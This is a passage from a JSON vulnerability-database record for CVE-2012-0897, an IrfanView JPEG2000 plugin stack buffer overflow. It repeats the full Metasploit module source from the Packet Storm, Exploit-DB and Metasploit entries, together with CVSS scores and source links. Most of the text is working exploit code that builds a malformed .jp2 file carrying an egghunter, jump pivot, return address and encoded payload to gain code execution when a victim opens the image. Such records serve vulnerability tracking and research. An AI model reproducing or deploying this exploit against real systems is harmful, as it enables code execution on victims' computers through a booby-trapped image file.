\"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1 \njp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1 \njp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1 \njp2 << \"\\xff\\x52\" # <0xff52=JP2C_COD> length 12 \njp2 << \"\\x00\\x0c\" # 12 bytes \njp2 << \"\\x00\" # codingStyle=0=entropy coder w/o partition \njp2 << \"\\x00\" # ProgressionOrder = 0 \njp2 << \"\\x00\\x05\" # NumberOfLayers = 0x5 \njp2 << \"\\x01\" # MultiComponentTransform=0x1=5/3 reversible \njp2 << \"\\x05\" # DecompLevels = 5 \njp2 << \"\\x04\" # CodeBlockWidthExponent=0x4+2 # cbw ->64 \njp2 << \"\\x04\" # CodeBlockHeightExponent=0x4+2 # cbh ->64 \njp2 << \"\\x00\" # CodeBLockStyle = 0 \njp2 << \"\\x00\" # QMIFBankId = 0 \n \neggoptions = \n{ \n:checksum => false, \n:eggtag => 'pwnd' \n} \n \nhunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) \nqcd_data = \"\" \nqcd_data << make_nops(10) \nqcd_data << encode_bytes(hunter) \nqcd_data << rand_text_alpha(146) \n \njmp_hunter = %q{ \njmp $-0xad \ninc ecx \n} \n \n# jump to our egghunter \njmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, 
jmp_hunter).encode_string \n \nqcd_data << encode_bytes(jmp_hunter) \nqcd_data << rand_text_alpha(196-qcd_data.length) \nqcd_data << encode_bytes([target.ret].pack(\"V\")) \n \n# align ecx and jmp \npivot = %q{ \ninc ch \njmp ecx \n} \n \npivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string \n \nqcd_data << encode_bytes(pivot) \nqcd_data << egg \n \njp2 << \"\\xff\\x5c\" # start \njp2 << \"\\x00\\xf5\" # arbitrary size to trigger overflow \njp2 << \"\\x22\" # guard \njp2 << qcd_data # malicious code \njp2 << \"\\xff\\x90\" # <0xff90=JP2C_SOT>len 10 \njp2 << \"\\x00\\x0a\" # 10 bytes \njp2 << \"\\x00\\x00\\x00\\x00\\x00\\x68\\x00\\x01\" \njp2 << \"\\xff\\x93\" # <0xff93=JP2C_SOD> Start of data \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\" \njp2 << \"\\xff\\xd9\" \n \n# Create the file \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(jp2) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/114409/irfanview_jpeg2000_bof.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T12:02:41", "description": "Irfanview JPEG2000. CVE-2012-0897. 
Local exploit for windows platform", "published": "2012-07-01T00:00:00", "type": "exploitdb", "title": "Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0897"], "modified": "2012-07-01T00:00:00", "id": "EDB-ID:19519", "href": "https://www.exploit-db.com/exploits/19519/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Egghunter\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in\r\n\t\t\t\tversion <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been\r\n\t\t\t\ttested on a specific version of irfanview (v4.3.2), although other versions may\r\n\t\t\t\twork also. The vulnerability is triggered via parsing an invalid qcd chunk\r\n\t\t\t\tstructure and specifying a malformed qcd size and data.\r\n\r\n\t\t\t\tPayload delivery and vulnerability trigger can be executed in multiple ways.\r\n\t\t\t\tThe user can double click the file, use the file dialog, open via the icon\r\n\t\t\t\tand drag/drop the file into Irfanview\\'s window. 
An egg hunter is used for\r\n\t\t\t\tstability.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu\r\n\t\t\t\t\t'juan vazquez' # more improvements\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0897' ],\r\n\t\t\t\t\t[ 'OSVDB', '78333'],\r\n\t\t\t\t\t[ 'BID', '51426' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.greyhathacker.net/?p=525' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'win' ],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4000,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# push esp; retn [i_view32.exe]\r\n\t\t\t\t\t# http://www.oldapps.com/irfanview.php?old_irfanview=7097\r\n\t\t\t\t\t# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe\r\n\t\t\t\t\t[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 16 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\t# encode our string like unicode except we are not using nulls\r\n\tdef encode_bytes(raw_bytes)\r\n\t\tencoded_bytes = \"\"\r\n\t\t0.step(raw_bytes.length-1, 2) { |i|\r\n\t\t\tencoded_bytes << raw_bytes[i+1]\r\n\t\t\tencoded_bytes << raw_bytes[i]\r\n\t\t}\r\n\t\treturn encoded_bytes\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tjp2 = \"\"\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0c\" #\r\n\t\tjp2 << \"\\x6a\\x50\\x20\\x20\" # [jP ] <0x6a502020> magic 0xd0a870a,len 12\r\n\t\tjp2 << \"\\x0d\\x0a\\x87\\x0a\" #\r\n\t\tjp2 << 
\"\\x00\\x00\\x00\\x14\" #\r\n\t\tjp2 << \"\\x66\\x74\\x79\\x70\" #\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x20\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # MinorVersion = 0 = [\\0\\0\\0\\0]\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x20\" # Compat = 0x6a703220 = [jp2 ]\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x38\" #\r\n\t\tjp2 << \"\\x75\\x75\\x69\\x64\" # [uuid] <0x75756964> len 56 data offset 8\r\n\t\tjp2 << \"\\x61\\x70\\x00\\xde\\xec\\x87\" # 56 bytes with start and end tags\r\n\t\tjp2 << \"\\xd5\\x11\\xb2\\xed\\x00\\x50\" #\r\n\t\tjp2 << \"\\x04\\x71\\xfd\\xdc\\xd2\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x40\\x01\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x60\\x09\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x30\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x2d\" #\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x68\" # [jp2h] <0x6a703268> len 45 data offset 8\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x16\" #\r\n\t\tjp2 << \"\\x69\\x68\\x64\\x72\" # [ihdr] <0x69686472> len 22 data offset 8\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # ImageHeight = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # ImageWidth = 10\r\n\t\tjp2 << \"\\x00\\x03\" # NumberOfComponents = 3\r\n\t\tjp2 << \"\\x07\" # BitsPerComponent = 7\r\n\t\tjp2 << \"\\x07\" # Compression = 7\r\n\t\tjp2 << \"\\x01\" # Colorspace = 0x1 = unknown\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x0f\" #\r\n\t\tjp2 << \"\\x63\\x6f\\x6c\\x72\" # [colr] <0x636f6c72> len 15 data offset 8\r\n\t\tjp2 << \"\\x01\" # Method = 1\r\n\t\tjp2 << \"\\x00\" # Precedence = 0\r\n\t\tjp2 << \"\\x00\" # ColorSpaceAproximation = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\" # EnumeratedColorSpace = 16 = sRGB\r\n\t\tjp2 << \"\\x10\\x00\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x63\" # [jp2c] <0x6a703263> length 0 data offset 8\r\n\t\tjp2 << \"\\xff\\x4f\" # <0xff4f=JP2C_SOC> Start of codestream\r\n\t\tjp2 << \"\\xff\\x51\" # <0xff51=JP2C_SIZ> length 47\r\n\t\tjp2 << \"\\x00\\x2f\" # 47 
bytes\r\n\t\tjp2 << \"\\x00\\x00\" # Capabilities = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # GridWidth = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # GridHeight = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # XImageOffset = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # YImageOffset = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # TileWidth = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # TileHeight = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # Xtileoffset = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # Ytileoffset = 0\r\n\t\tjp2 << \"\\x00\\x03\" # NumberOfComponents = 3\r\n\t\tjp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\r\n\t\tjp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\r\n\t\tjp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\r\n\t\tjp2 << \"\\xff\\x52\" # <0xff52=JP2C_COD> length 12\r\n\t\tjp2 << \"\\x00\\x0c\" # 12 bytes\r\n\t\tjp2 << \"\\x00\" # codingStyle=0=entropy coder w/o partition\r\n\t\tjp2 << \"\\x00\" # ProgressionOrder = 0\r\n\t\tjp2 << \"\\x00\\x05\" # NumberOfLayers = 0x5\r\n\t\tjp2 << \"\\x01\" # MultiComponentTransform=0x1=5/3 reversible\r\n\t\tjp2 << \"\\x05\" # DecompLevels = 5\r\n\t\tjp2 << \"\\x04\" # CodeBlockWidthExponent=0x4+2 # cbw ->64\r\n\t\tjp2 << \"\\x04\" # CodeBlockHeightExponent=0x4+2 # cbh ->64\r\n\t\tjp2 << \"\\x00\" # CodeBLockStyle = 0\r\n\t\tjp2 << \"\\x00\" # QMIFBankId = 0\r\n\r\n\t\teggoptions =\r\n\t\t{\r\n\t\t\t:checksum => false,\r\n\t\t\t:eggtag => 'pwnd'\r\n\t\t}\r\n\r\n\t\thunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\r\n\t\tqcd_data = \"\"\r\n\t\tqcd_data << make_nops(10)\r\n\t\tqcd_data << encode_bytes(hunter)\r\n\t\tqcd_data << rand_text_alpha(146)\r\n\r\n\t\tjmp_hunter = %q{\r\n\t\t\tjmp $-0xad\r\n\t\t\tinc ecx\r\n\t\t}\r\n\r\n\t\t# jump to our egghunter\r\n\t\tjmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string\r\n\r\n\t\tqcd_data << encode_bytes(jmp_hunter)\r\n\t\tqcd_data << 
rand_text_alpha(196-qcd_data.length)\r\n\t\tqcd_data << encode_bytes([target.ret].pack(\"V\"))\r\n\r\n\t\t# align ecx and jmp\r\n\t\tpivot = %q{\r\n\t\t\tinc ch\r\n\t\t\tjmp ecx\r\n\t\t}\r\n\r\n\t\tpivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string\r\n\r\n\t\tqcd_data << encode_bytes(pivot)\r\n\t\tqcd_data << egg\r\n\r\n\t\tjp2 << \"\\xff\\x5c\" # start\r\n\t\tjp2 << \"\\x00\\xf5\" # arbitrary size to trigger overflow\r\n\t\tjp2 << \"\\x22\" # guard\r\n\t\tjp2 << qcd_data # malicious code\r\n\t\tjp2 << \"\\xff\\x90\" # <0xff90=JP2C_SOT>len 10\r\n\t\tjp2 << \"\\x00\\x0a\" # 10 bytes\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x00\\x68\\x00\\x01\"\r\n\t\tjp2 << \"\\xff\\x93\" # <0xff93=JP2C_SOD> Start of data\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\"\r\n\t\tjp2 << \"\\xff\\xd9\"\r\n\r\n\t\t# Create the file\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(jp2)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19519/"}], "metasploit": [{"lastseen": "2020-10-13T00:43:38", "description": "This module exploits a stack-based buffer overflow vulnerability in version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. 
This exploit has been tested on a specific version of irfanview (v4.3.2), although other versions may work also. The vulnerability is triggered via parsing an invalid qcd chunk structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon and drag/drop the file into Irfanview's window. An egg hunter is used for stability.\n", "published": "2012-06-29T18:13:02", "type": "metasploit", "title": "Irfanview JPEG2000 jp2 Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0897"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/IRFANVIEW_JPEG2000_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Irfanview JPEG2000 jp2 Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. 
An egg hunter\n is used for stability.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery\n 'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu\n 'juan vazquez' # more improvements\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0897' ],\n [ 'OSVDB', '78333'],\n [ 'BID', '51426' ],\n [ 'URL', 'http://www.greyhathacker.net/?p=525' ],\n ],\n 'Platform' => [ 'win' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 4000,\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n # push esp; retn [i_view32.exe]\n # http://www.oldapps.com/irfanview.php?old_irfanview=7097\n # http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe\n [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]\n ],\n 'DisclosureDate' => '2012-01-16',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),\n ])\n end\n\n # encode our string like unicode except we are not using nulls\n def encode_bytes(raw_bytes)\n encoded_bytes = \"\"\n 0.step(raw_bytes.length-1, 2) { |i|\n encoded_bytes << raw_bytes[i+1]\n encoded_bytes << raw_bytes[i]\n }\n return encoded_bytes\n end\n\n def exploit\n jp2 = \"\"\n jp2 << \"\\x00\\x00\\x00\\x0c\" #\n jp2 << \"\\x6a\\x50\\x20\\x20\" # [jP ] <0x6a502020> magic 0xd0a870a,len 12\n jp2 << \"\\x0d\\x0a\\x87\\x0a\" #\n jp2 << \"\\x00\\x00\\x00\\x14\" #\n jp2 << \"\\x66\\x74\\x79\\x70\" #\n jp2 << \"\\x6a\\x70\\x32\\x20\" #\n jp2 << \"\\x00\\x00\\x00\\x00\" # MinorVersion = 0 = [\\0\\0\\0\\0]\n jp2 << \"\\x6a\\x70\\x32\\x20\" # Compat = 0x6a703220 = [jp2 ]\n jp2 << \"\\x00\\x00\\x00\\x38\" #\n jp2 << \"\\x75\\x75\\x69\\x64\" # [uuid] <0x75756964> len 56 data offset 8\n jp2 << \"\\x61\\x70\\x00\\xde\\xec\\x87\" # 56 bytes with start and end tags\n jp2 << \"\\xd5\\x11\\xb2\\xed\\x00\\x50\" #\n jp2 << 
\"\\x04\\x71\\xfd\\xdc\\xd2\\x00\" #\n jp2 << \"\\x00\\x00\\x40\\x01\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x00\\x00\\x60\\x09\" #\n jp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x30\\x00\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x00\\x2d\" #\n jp2 << \"\\x6a\\x70\\x32\\x68\" # [jp2h] <0x6a703268> len 45 data offset 8\n jp2 << \"\\x00\\x00\\x00\\x16\" #\n jp2 << \"\\x69\\x68\\x64\\x72\" # [ihdr] <0x69686472> len 22 data offset 8\n jp2 << \"\\x00\\x00\\x00\\x0a\" # ImageHeight = 10\n jp2 << \"\\x00\\x00\\x00\\x0a\" # ImageWidth = 10\n jp2 << \"\\x00\\x03\" # NumberOfComponents = 3\n jp2 << \"\\x07\" # BitsPerComponent = 7\n jp2 << \"\\x07\" # Compression = 7\n jp2 << \"\\x01\" # Colorspace = 0x1 = unknown\n jp2 << \"\\x00\\x00\\x00\\x00\\x0f\" #\n jp2 << \"\\x63\\x6f\\x6c\\x72\" # [colr] <0x636f6c72> len 15 data offset 8\n jp2 << \"\\x01\" # Method = 1\n jp2 << \"\\x00\" # Precedence = 0\n jp2 << \"\\x00\" # ColorSpaceAproximation = 0\n jp2 << \"\\x00\\x00\\x00\" # EnumeratedColorSpace = 16 = sRGB\n jp2 << \"\\x10\\x00\\x00\\x00\\x00\" #\n jp2 << \"\\x6a\\x70\\x32\\x63\" # [jp2c] <0x6a703263> length 0 data offset 8\n jp2 << \"\\xff\\x4f\" # <0xff4f=JP2C_SOC> Start of codestream\n jp2 << \"\\xff\\x51\" # <0xff51=JP2C_SIZ> length 47\n jp2 << \"\\x00\\x2f\" # 47 bytes\n jp2 << \"\\x00\\x00\" # Capabilities = 0\n jp2 << \"\\x00\\x00\\x00\\x0a\" # GridWidth = 10\n jp2 << \"\\x00\\x00\\x00\\x0a\" # GridHeight = 10\n jp2 << \"\\x00\\x00\\x00\\x00\" # XImageOffset = 0\n jp2 << \"\\x00\\x00\\x00\\x00\" # YImageOffset = 0\n jp2 << \"\\x00\\x00\\x00\\x0a\" # TileWidth = 10\n jp2 << \"\\x00\\x00\\x00\\x0a\" # TileHeight = 10\n jp2 << \"\\x00\\x00\\x00\\x00\" # Xtileoffset = 0\n jp2 << \"\\x00\\x00\\x00\\x00\" # Ytileoffset = 0\n jp2 << \"\\x00\\x03\" # NumberOfComponents = 3\n jp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\n jp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\n 
jp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\n jp2 << \"\\xff\\x52\" # <0xff52=JP2C_COD> length 12\n jp2 << \"\\x00\\x0c\" # 12 bytes\n jp2 << \"\\x00\" # codingStyle=0=entropy coder w/o partition\n jp2 << \"\\x00\" # ProgressionOrder = 0\n jp2 << \"\\x00\\x05\" # NumberOfLayers = 0x5\n jp2 << \"\\x01\" # MultiComponentTransform=0x1=5/3 reversible\n jp2 << \"\\x05\" # DecompLevels = 5\n jp2 << \"\\x04\" # CodeBlockWidthExponent=0x4+2 # cbw ->64\n jp2 << \"\\x04\" # CodeBlockHeightExponent=0x4+2 # cbh ->64\n jp2 << \"\\x00\" # CodeBLockStyle = 0\n jp2 << \"\\x00\" # QMIFBankId = 0\n\n eggoptions =\n {\n :checksum => false,\n :eggtag => 'pwnd'\n }\n\n hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\n qcd_data = \"\"\n qcd_data << make_nops(10)\n qcd_data << encode_bytes(hunter)\n qcd_data << rand_text_alpha(146)\n\n jmp_hunter = %q{\n jmp $-0xad\n inc ecx\n }\n\n # jump to our egghunter\n jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string\n\n qcd_data << encode_bytes(jmp_hunter)\n qcd_data << rand_text_alpha(196-qcd_data.length)\n qcd_data << encode_bytes([target.ret].pack(\"V\"))\n\n # align ecx and jmp\n pivot = %q{\n inc ch\n jmp ecx\n }\n\n pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string\n\n qcd_data << encode_bytes(pivot)\n qcd_data << egg\n\n jp2 << \"\\xff\\x5c\" # start\n jp2 << \"\\x00\\xf5\" # arbitrary size to trigger overflow\n jp2 << \"\\x22\" # guard\n jp2 << qcd_data # malicious code\n jp2 << \"\\xff\\x90\" # <0xff90=JP2C_SOT>len 10\n jp2 << \"\\x00\\x0a\" # 10 bytes\n jp2 << \"\\x00\\x00\\x00\\x00\\x00\\x68\\x00\\x01\"\n jp2 << \"\\xff\\x93\" # <0xff93=JP2C_SOD> Start of data\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << 
\"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\"\n jp2 << \"\\xff\\xd9\"\n\n # Create the file\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(jp2)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb"}]}